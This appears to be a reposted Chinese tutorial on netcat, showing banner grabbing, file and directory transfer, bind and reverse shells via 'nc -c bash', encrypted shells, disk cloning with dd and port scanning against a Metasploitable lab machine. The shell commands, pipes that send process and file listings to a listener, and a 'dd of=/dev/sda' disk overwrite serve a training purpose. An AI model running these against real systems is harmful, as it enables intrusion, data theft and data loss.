10+11、任务10、11——常用工具NC

本文阅读 4 分钟
首页 代码,C/C#/C++ 正文
0、NC的简介:https://www.cnblogs.com/ECJTUACM-873284962/p/9712882.html        
//网上找的博客
1、NC的特点和功能:

• 网络⼯工具中的瑞士军刀——小身材、大智慧 • 侦听模式 / 传输模式

①、获取banner信息 ②、传输文本信息 ③、传输文件/目录 (加密传输文件) ④、 远程控制/木马 ⑤、加密所有流量 ⑥、流媒体服务器 ⑦、远程克隆硬盘 ⑧、扫描端口

2、NC——获取banner信息
nc   -h        //查看帮助信息
nc   -n        //后接IP地址,不能接域名,因为-n参数不做dns的解析
nc   -v      //verbose,详细的信息

例子1:使用nc的telnet获取banner信息
# ping pop3.163.com
PING pop3.163.idns.yeah.net (123.126.97.79) 56(84) bytes of data.
64 bytes from mail-m9779.mail.163.com (123.126.97.79): icmp_seq=1 ttl=128 time=47.4 ms
64 bytes from mail-m9779.mail.163.com (123.126.97.79): icmp_seq=2 ttl=128 time=50.2 ms
64 bytes from mail-m9779.mail.163.com (123.126.97.79): icmp_seq=3 ttl=128 time=47.7 ms
64 bytes from mail-m9779.mail.163.com (123.126.97.79): icmp_seq=4 ttl=128 time=47.9 ms
64 bytes from mail-m9779.mail.163.com (123.126.97.79): icmp_seq=5 ttl=128 time=51.4 ms
^C
--- pop3.163.idns.yeah.net ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4006ms
rtt min/avg/max/mdev = 47.433/48.955/51.449/1.599 ms

# nc -nv 123.126.97.79 110
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Connected to 123.126.97.79:110.
+OK Welcome to coremail Mail Pop3 Server (163coms[10774b260cc7a37d26d71b52404dcf5cs])

例子2:使用nc的telnet获取banner信息
# ping smtp.163.com
PING smtp.163.com (220.181.12.12) 56(84) bytes of data.
64 bytes from m12-12.163.com (220.181.12.12): icmp_seq=1 ttl=128 time=55.3 ms
64 bytes from m12-12.163.com (220.181.12.12): icmp_seq=2 ttl=128 time=53.8 ms
64 bytes from m12-12.163.com (220.181.12.12): icmp_seq=3 ttl=128 time=69.1 ms
64 bytes from m12-12.163.com (220.181.12.12): icmp_seq=4 ttl=128 time=53.3 ms
64 bytes from m12-12.163.com (220.181.12.12): icmp_seq=5 ttl=128 time=53.0 ms
^C
--- smtp.163.com ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4007ms
rtt min/avg/max/mdev = 52.968/56.904/69.076/6.139 ms

# nc -nv 220.181.12.12 25
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Connected to 220.181.12.12:25.
220 163.com Anti-spam GT for Coremail System (163com[20141201])

例子3:使用nc的telnet获取banner信息
//此处的目标,不再是公网上的服务器了
//此处的目标,是自己搭建的Metasploitable靶机(IP地址为192.168.97.140)
nc -nv 192.168.97.140 80
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.97.140:80.
head/        (注意此处是自己输入的head/  可以查看该web的主页)
<html><head><title>Metasploitable2 - Linux</title></head><body>
<pre>

                _                  _       _ _        _     _      ____  
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ 
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ 
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|                                          


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started


</pre>
<ul>
<li><a href="/twiki/">TWiki</a></li>
<li><a href="/phpMyAdmin/">phpMyAdmin</a></li>
<li><a href="/mutillidae/">Mutillidae</a></li>
<li><a href="/dvwa/">DVWA</a></li>
<li><a href="/dav/">WebDAV</a></li>
</ul>
</body>
</html>

验证:我们在浏览器里面打开该IP地址的网页,如下图所示:

img

2、NC——传输文本信息
例子1:利用NC传输文本信息
侦听端:Metasploitable端(192.168.97.140)
nc -lp 8443
//相当于服务器端,打开可被连接的端口8443

传输端:Kali端(192.168.97.129)
nc -nv 192.168.97.140 8443
//相当于客户端,nc服务器端的ip+port,即可连接

连接成功后,即可进行传输文本信息,也就是聊天咯,如下图所示:

img img

3、NC——传输文件/目录
例子1:利用NC传输文件
接收端:打开侦听,Metasploitable(192.168.97.140)
nc -lp 8443 > ls.txt
发送端:kali
ls -l | nc -nv 192.168.97.140 8443
或者:
ls -l > ls.txt
nc -nc 192.168.97.140 8443 < ls.txt

例子2:利用NC传输文件
接收端:打开侦听,kali(192.168.97.129)
nc -lp 8443 > ps.txt
发送端:Metasploitable
ps aux | nc -nv 192.168.97.129 8443 -q 1
或者:
ps aux > ps.txt
nc -nv 192.168.97.129 8443 < ps.txt

例子3:利用NC传输文件
发送端:打开侦听,kali(192.168.97.129)
lsof | nc -lp 8443
或者:
lsof > lsof.txt
nc -lp 8443 < lsof.txt
接收端:Metasploitable
nc -nv 192.168.97.129 8443 > lsof.txt

总之:无论是侦听端还是传输端都能作为接收和发送端
第一种:箭头传输
<  是从本地导入到连接内
>  是从连接导出到本地
第二种:命令传输
发送端,先命令后建立连接
接收端,先建立连接后命令
//只有接收端口才能使用 -q 1

例子4:利用NC传输目录
发送端:打开侦听,kali(192.168.97.129)
tar -cxvf - CTF/ | nc -lp 8443
接收端:Metasploitable
nc -nv 192.168.97.129 8443 | tar -zxvf  - -q 1
//-q 1 是连接成功并且接收文件成功后1秒断开连接

例子5:利用NC加密传输文件,其实用到的是其他命令
发送端:打开侦听,kali(192.168.97.129)
mcrypt --flush -Fbq -a rijndael-256 -m ecb < wget-log | nc -lp 8443
接收端:Metasploitable
nc -nv 192.168.97.129 8443  | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > wget-log
4、NC——远程控制telnet
例子1:利用NC正向远程控制
侦听端:nc -lp 8443 -c bash
传输端:nc -nv 192.168.97.140 8443

例子2:利用NC反向远程控制
侦听端:nc -lp 8443
nc -nv 192.168.97.140 -c bash

//总之:只要是带有-c bash的一端,就是被控制的一端
5、NC——加密所有流量

//实质就是,加密NC建立起来的隧道

侦听端:(192.168.97.140)
nc -c bash --allow 192.168.97.129 -nvlp 8443 --ssl
//只允许192.168.97.129的连接,并且经过了ssl的加密,就算wireshark抓到包,也是加密后的流量
连接端:
nc -nv 192.168.97.140 8443 --ssl
6、NC——流媒体传输

//通俗的来讲,就相当于服务器端一边传输视频,客户端一边在线观看视频

例子1:
发送端:kali(192.168.97.129)
cat 1.mp4 | nc -lp 8443
接收端:kali_2
nc -nv 192.168.97.129 8443 | mplayer -vo x11 -cache 3000-
//mplayer是一个播放器
7、NC——远程克隆硬盘

//可以用来取证

被取证的电脑:刻录硬盘打开侦听
dd if=/dev/sda | nc -lp 8443
取证方:建立连接,刻录下来硬盘
nc -nv x.x.x.x 8443 | dd of=/dev/sda

8、NC——扫描端口

扫描方:kali(192.168.97.129)
nc -nvz 192.168.97.140 1-65535
//这种扫描很快
被扫描方:Metasploitable(192.168.97.140)

如下所示:
 #nc -nvz 192.168.97.140 1-65535
(UNKNOWN) [192.168.97.140] 60142 (?) open
(UNKNOWN) [192.168.97.140] 57529 (?) open
(UNKNOWN) [192.168.97.140] 55880 (?) open
(UNKNOWN) [192.168.97.140] 49199 (?) open
(UNKNOWN) [192.168.97.140] 35977 (?) open
(UNKNOWN) [192.168.97.140] 35214 (?) open
(UNKNOWN) [192.168.97.140] 8787 (?) open
(UNKNOWN) [192.168.97.140] 8180 (?) open
(UNKNOWN) [192.168.97.140] 8009 (?) open
(UNKNOWN) [192.168.97.140] 6697 (?) open
(UNKNOWN) [192.168.97.140] 6667 (ircd) open
(UNKNOWN) [192.168.97.140] 6000 (x11) open
(UNKNOWN) [192.168.97.140] 5900 (?) open
(UNKNOWN) [192.168.97.140] 5432 (postgresql) open
(UNKNOWN) [192.168.97.140] 3632 (distcc) open
(UNKNOWN) [192.168.97.140] 3306 (mysql) open
(UNKNOWN) [192.168.97.140] 2121 (iprop) open
(UNKNOWN) [192.168.97.140] 2049 (nfs) open
(UNKNOWN) [192.168.97.140] 1524 (ingreslock) open
(UNKNOWN) [192.168.97.140] 1099 (rmiregistry) open
(UNKNOWN) [192.168.97.140] 514 (shell) open
(UNKNOWN) [192.168.97.140] 513 (login) open
(UNKNOWN) [192.168.97.140] 512 (exec) open
(UNKNOWN) [192.168.97.140] 445 (microsoft-ds) open
(UNKNOWN) [192.168.97.140] 139 (netbios-ssn) open
(UNKNOWN) [192.168.97.140] 111 (sunrpc) open
(UNKNOWN) [192.168.97.140] 80 (www) open
(UNKNOWN) [192.168.97.140] 53 (domain) open
(UNKNOWN) [192.168.97.140] 25 (smtp) open
(UNKNOWN) [192.168.97.140] 23 (telnet) open
(UNKNOWN) [192.168.97.140] 22 (ssh) open
(UNKNOWN) [192.168.97.140] 21 (ftp) open

# nc -nvzu 192.168.97.140 1-65535
(UNKNOWN) [192.168.97.140] 54891 (?) open
(UNKNOWN) [192.168.97.140] 50962 (?) open
(UNKNOWN) [192.168.97.140] 45810 (?) open
(UNKNOWN) [192.168.97.140] 45360 (?) open
(UNKNOWN) [192.168.97.140] 2049 (nfs) open
(UNKNOWN) [192.168.97.140] 791 (?) open
(UNKNOWN) [192.168.97.140] 138 (netbios-dgm) open
(UNKNOWN) [192.168.97.140] 137 (netbios-ns) open
(UNKNOWN) [192.168.97.140] 111 (sunrpc) open
(UNKNOWN) [192.168.97.140] 69 (tftp) open
(UNKNOWN) [192.168.97.140] 68 (bootpc) open
(UNKNOWN) [192.168.97.140] 53 (domain) open
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/104364589
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复